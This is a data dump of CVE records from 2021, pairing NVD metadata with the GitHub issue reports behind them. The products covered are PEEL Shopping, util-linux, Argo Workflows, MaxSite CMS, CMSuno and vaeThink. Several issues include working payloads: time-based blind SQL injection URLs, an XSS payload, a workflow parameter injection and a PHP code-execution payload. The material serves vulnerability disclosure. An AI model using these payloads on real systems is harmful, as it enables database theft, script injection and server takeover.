{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.netbytesec.com/advisories/UnauthenticatedBlindSQLInjectionVulnerabilityInPEELShopping/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/advisto/peel-shopping/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/faisalfs10x/CVE-IDs/blob/main/2021/CVE-2021-37593/Proof_of_Concept.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.netbytesec.com/advisories/UnauthenticatedBlindSQLInjectionVulnerabilityInPEELShopping/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/advisto/peel-shopping/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/faisalfs10x/CVE-IDs/blob/main/2021/CVE-2021-37593/Proof_of_Concept.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peel:peel_shopping:9.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "45FFE80C-0ABF-494F-9AE3-9A35E2535DC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/advisto/peel-shopping/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "advisto", "peel-shopping" ]
**Vulnerability Name:** SQL Injection in "_produit_details.php?id_" parameter **Date of Discovery:** 10 July 2021 **Product version:** 9.4.0 . [Download link](https://drive.google.com/file/d/1FM8du7J6DDxE-LwVmH8JI502vvom-DUU/view?usp=sharing) **Author:** faisalfs10x **Vulnerability Description:** Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "_id_" parameter on the "_/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]_" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. **Vulnerable URL:** _http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]_ **Proof of Concept:** **1)** Assumed peel-shopping_9_4_0 out of box installation database name is _peel_. This query will check if _database()_ name like _hex(%peel%)_ - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "_peel_". **url :** http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) [PoC enum db name] ![enum_dbname](https://user-images.githubusercontent.com/51811615/125202026-5ac05480-e2a4-11eb-8aa8-0bd79718769f.png) **2)** Assumed the web is using MariaDB database server - check if db_version like _hex(%MariaDB%)_, it will delay for 5 seconds if TRUE. **url :** http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) [Poc enum MariaDB] ![enum_dbversion(MariaDB)](https://user-images.githubusercontent.com/51811615/125202107-b68add80-e2a4-11eb-8b16-5f03eedcb275.PNG) **3)** By default, the database have a table name = peel_produits. This query will check if table_name _peel_produits_ is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly. **url :** http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) [PoC enum table peel_produits] ![enum_tablename](https://user-images.githubusercontent.com/51811615/125202148-d91cf680-e2a4-11eb-95fe-5dd3c633f285.png) To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like BurpSuite (repeater). **Error syntax:** http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR) 1. [MariaDB disclosed image] ![sql_error_mariadb](https://user-images.githubusercontent.com/51811615/125202162-e934d600-e2a4-11eb-8a08-9086e37f1706.png) 2. [peel_produits table_name disclosed] ![sql_errorbased2](https://user-images.githubusercontent.com/51811615/125202167-efc34d80-e2a4-11eb-9158-a66b2297eff3.png) **Dump table name = peel_profil** ![dump_table_peel_profil](https://user-images.githubusercontent.com/51811615/125201991-2b114c80-e2a4-11eb-9c16-3a5197bcb51a.PNG) **Consequences:** - Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities. - Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack. **Mitigation:** Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id']) cc @advisto **References for Mitigation Vulnerability:** https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
SQL Injection in "produit_details.php?id" parameter (Unauthenticated)
https://api.github.com/repos/advisto/peel-shopping/issues/3/comments
5
2021-07-11T15:58:00Z
2021-08-03T03:51:11Z
https://github.com/advisto/peel-shopping/issues/3
941,482,705
3
2,255
CVE-2021-37600
2021-07-30T14:15:18.737
An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 1.2, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 1.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/karelzak/util-linux/issues/1395" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00005.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202401-08" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210902-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/karelzak/util-linux/issues/1395" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202401-08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210902-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kernel:util-linux:*:*:*:*:*:*:*:*", "matchCriteriaId": "332D3DCC-3B7E-466E-844E-F2014DC27B45", "versionEndExcluding": null, "versionEndIncluding": "2.37.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*", "matchCriteriaId": "E7CF3019-975D-40BB-A8A4-894E62BD3797", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/karelzak/util-linux/issues/1395
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "karelzak", "util-linux" ]
Hi, It seems that there exists a potential integer overflow that can lead buffer overflows. Please find the following description: 1. `sems_nsems` can be an arbitrary large number https://github.com/karelzak/util-linux/blob/8344a81f7a726cef4640f9368bd6728eff6987bc/sys-utils/ipcutils.c#L272 2. Call to `get_sem_elements` with the structure https://github.com/karelzak/util-linux/blob/8344a81f7a726cef4640f9368bd6728eff6987bc/sys-utils/ipcutils.c#L217 3. Call to `calloc` with the large integer can cause a memory allocation with an overflowed size https://github.com/karelzak/util-linux/blob/8344a81f7a726cef4640f9368bd6728eff6987bc/sys-utils/ipcutils.c#L224
Potential integer overflow in ipcutils.c
https://api.github.com/repos/util-linux/util-linux/issues/1395/comments
14
2021-07-27T08:45:02Z
2021-09-21T09:06:22Z
https://github.com/util-linux/util-linux/issues/1395
953,649,356
1,395
2,256
CVE-2021-37914
2021-08-03T00:15:08.607
In Argo Workflows through 3.1.3, if EXPRESSION_TEMPLATES is enabled and untrusted users are allowed to specify input parameters when running workflows, an attacker may be able to disrupt a workflow because expression template output is evaluated.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/argoproj/argo-workflows/issues/6441" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/argoproj/argo-workflows/pull/6442" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/argoproj/argo-workflows/issues/6441" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/argoproj/argo-workflows/pull/6442" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:argo-workflows_project:argo-workflows:*:*:*:*:*:*:*:*", "matchCriteriaId": "6647BDF6-0B71-4459-B099-1FC0BDA1FF4C", "versionEndExcluding": null, "versionEndIncluding": "3.1.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/argoproj/argo-workflows/issues/6441
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "argoproj", "argo-workflows" ]
# Summary It's possible to rewrite parts of a workflow on-cluster using only an input parameter. Operators who allows users to run workflows specifying input parameters are vulnerable to this. # Details From @mac9416 : It's possible to rewrite parts of a workflow on-cluster using only an input parameter. This relies on taking advantage of the fact that the output of expression templates is evaluated a a literal part of the JSON-stringified template. The following workflow accepts a string param, performs a trivial transformation (in this case, just printing it), and then passes the output as an env var to be printed. The poisoned param value is able to overwrite "args" because 1) the golang JSON marshaler allows duplicate keys and, 2) the stringified template keys seem to be alphabetically-ordered, so the poisoned "env" value can override the original "args" field. This is just a quick proof-of-concept. The motivated attacker could probably find a lot of different and nefarious ways to mutate a workflow. I believe this PR would close the vulnerability: https://github.com/argoproj/argo-workflows/pull/6285 ``` # argo submit rewrite-args.yaml -p 'a="}], "args": ["echo nope"], "env": [{"name": "MESSAGE", "value": "unused' apiVersion: argoproj.io/v1alpha1 kind: Workflow metadata: generateName: rewrite-args spec: entrypoint: main arguments: parameters: - name: a templates: - name: main steps: - - name: concat template: concat - - name: print template: print arguments: parameters: - name: message value: "{{steps.concat.outputs.result}}" - name: concat script: image: debian:9.4 command: [bash] env: - name: A value: "{{workflow.parameters.a}}" source: | echo "$A" - name: print inputs: parameters: - name: message container: image: debian:9.4 command: [bash, -c] args: - echo "$MESSAGE" env: - name: MESSAGE value: "{{=inputs.parameters['message']}}" ``` Note: there seems to be some non-determinism involved. The expected behavior is for the "print" step to output "this happens instead". If instead you get an error, re-submit a few times. --- <!-- Issue Author: Don't delete this message to encourage other users to support your issue! --> **Message from the maintainers**: Impacted by this bug? Give it a 👍. We prioritise the issues with the most 👍.
workflow re-write vulnerability using input parameter
https://api.github.com/repos/argoproj/argo-workflows/issues/6441/comments
1
2021-07-28T16:14:54Z
2021-08-09T20:13:53Z
https://github.com/argoproj/argo-workflows/issues/6441
955,021,937
6,441
2,257
CVE-2021-35265
2021-08-03T12:15:07.880
A reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/414#issue-726249183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/maxsite/cms/issues/414#issue-726249183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "7DF4DB5E-8339-4985-9ABC-811FC2C28960", "versionEndExcluding": "106", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/maxsite/cms/issues/414#issue-726249183
[ "Exploit", "Third Party Advisory" ]
github.com
[ "maxsite", "cms" ]
Although CMS has protection means But after testing, the protection is not comprehensive enough.. like this [http://localhost/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(1)%3E](url) ![maxsite_xss2](https://user-images.githubusercontent.com/73220685/96693067-5fad4300-13b9-11eb-8873-8e1d41d7a451.png)
Cross Site Scripting Vulnerability on http://localhost/maxsite/page/*
https://api.github.com/repos/maxsite/cms/issues/414/comments
2
2020-10-21T08:15:04Z
2020-10-21T09:50:08Z
https://github.com/maxsite/cms/issues/414
726,249,183
414
2,258
CVE-2021-36654
2021-08-03T18:15:16.777
CMSuno 1.7 is vulnerable to an authenticated stored cross site scripting in modifying the filename parameter (tgo) while updating the theme.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/163737/CMSuno-1.7-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/boiteasite/cmsuno/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/163737/CMSuno-1.7-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/boiteasite/cmsuno/issues/17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cmsuno_project:cmsuno:1.7:*:*:*:*:*:*:*", "matchCriteriaId": "5E41E4F5-3295-4EB8-A1E5-F85ECBE66713", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/boiteasite/cmsuno/issues/17
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "boiteasite", "cmsuno" ]
Hi :) cmsuno version 1.7 is vulnerable to a stored cross site scripting. An authenticated attacker can inject a payload while updating the template's image filename after intercepting the request using Burpsuite via the **tgo** parameter. After successful update of the template, the xss is poped up in the website page. ## Steps to reproduce 1. Go to /uno.php and click on **plugins** 2. Click on **Logo** ![1](https://user-images.githubusercontent.com/55635633/125003748-cbbafe80-e04f-11eb-816f-9199907fe0a6.png) 3. Choose a random picture in your files repository, click on **save** and intercept the request using BurpSuite 4. Change the **tgo** parameter value with the following ![2](https://user-images.githubusercontent.com/55635633/125004315-2b65d980-e051-11eb-999b-234c1123092b.png) 5. Forward the request and click on publish ![3](https://user-images.githubusercontent.com/55635633/125004080-9f53b200-e050-11eb-983b-76381c4def95.png) 6. Click on **See the website** ![4](https://user-images.githubusercontent.com/55635633/125004133-c4482500-e050-11eb-85c1-fc72384be2e0.png) 7. XSS ![5](https://user-images.githubusercontent.com/55635633/125004373-4cc6c580-e051-11eb-9535-b8e0affbe922.png) ![6](https://user-images.githubusercontent.com/55635633/125004344-3caee600-e051-11eb-8acd-a6e9d63222bc.png) Thanks
CMSuno v1.7 stored XSS
https://api.github.com/repos/boiteasite/cmsuno/issues/17/comments
6
2021-07-09T00:02:59Z
2021-08-04T11:00:06Z
https://github.com/boiteasite/cmsuno/issues/17
940,304,073
17
2,259
CVE-2020-19301
2021-08-03T22:15:08.927
A vulnerability in the vae_admin_rule database table of vaeThink v1.0.1 allows attackers to execute arbitrary code via a crafted payload in the condition parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/94.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tingyuu/vaeThink/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/94.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tingyuu/vaeThink/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vaethink:vaethink:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "663B818E-34C7-49FE-8484-C5670FE13D7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/tingyuu/vaeThink/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tingyuu", "vaeThink" ]
#### Vulnerability description: There is a vulnerability which allows remote attackers to execute arbitrary code. The user can control the value of the field 'condition' of the database table 'vae_admin_rule', which is used for the parameters of the code execution function in the administrator privilege check module. #### Payload: ```123);system("echo ".base64_decode("Ijw/cGhwIHBocGluZm8oKTsi").">yunsle.php"``` #### POC: Firstly, we put the payload into the place as follows: ![image](https://user-images.githubusercontent.com/18137763/57698303-ecfa4d00-7687-11e9-9b48-6e29c2595280.png) Then we create a new role group, which has limited privileges: ![image](https://user-images.githubusercontent.com/18137763/57698495-54b09800-7688-11e9-969c-b860f8073dd2.png) And we create a user that belongs to this role group: ![image](https://user-images.githubusercontent.com/18137763/57698596-917c8f00-7688-11e9-9da2-94cc179b51fd.png) We login as 'test', and it's obvious that user 'test' has no privilege to access any page: ![image](https://user-images.githubusercontent.com/18137763/57698769-f33cf900-7688-11e9-8c0b-861b257d9aa1.png) But the payload has been executed when the system checked the privileges: ![image](https://user-images.githubusercontent.com/18137763/57699225-e240b780-7689-11e9-9ab7-69a73b75bf58.png) ![image](https://user-images.githubusercontent.com/18137763/57699165-ce955100-7689-11e9-8334-2be8ba185008.png)
There is an Arbitrary Code Execution Vulnerability
https://api.github.com/repos/tingyuu/vaeThink/issues/1/comments
0
2019-05-14T13:00:14Z
2019-05-14T13:00:14Z
https://github.com/tingyuu/vaeThink/issues/1
443,901,461
1
2,260
CVE-2020-19302
2021-08-03T22:15:08.970
An arbitrary file upload vulnerability in the avatar upload function of vaeThink v1.0.1 allows attackers to open a webshell via changing uploaded file suffixes to ".php".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tingyuu/vaeThink/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tingyuu/vaeThink/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vaethink:vaethink:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "663B818E-34C7-49FE-8484-C5670FE13D7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/tingyuu/vaeThink/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tingyuu", "vaeThink" ]
#### Vulnerability description: There is an arbitrary file upload vulnerability which allows remote attackers to execute arbitrary code. The system server does not perform file suffix detection on the administrator avatar upload function. #### POC: ![image](https://user-images.githubusercontent.com/18137763/57700469-9fccaa00-768c-11e9-93c3-7ec9e85c4c0d.png) ![image](https://user-images.githubusercontent.com/18137763/57700519-bf63d280-768c-11e9-9e7b-ca25e16d305f.png) We change the filename to "t.php": ![image](https://user-images.githubusercontent.com/18137763/57700559-d5719300-768c-11e9-8c4d-5f04c21cc919.png) The webshell has been uploaded: ![image](https://user-images.githubusercontent.com/18137763/57700600-e8846300-768c-11e9-9b09-b8cd516fb299.png) ![image](https://user-images.githubusercontent.com/18137763/57700681-0b167c00-768d-11e9-909d-4498d4c049f8.png)
There is an Arbitrary File Upload Vulnerability
https://api.github.com/repos/tingyuu/vaeThink/issues/2/comments
0
2019-05-14T13:14:44Z
2019-05-14T13:14:44Z
https://github.com/tingyuu/vaeThink/issues/2
443,908,517
2
2,261
CVE-2020-19304
2021-08-03T22:15:09.043
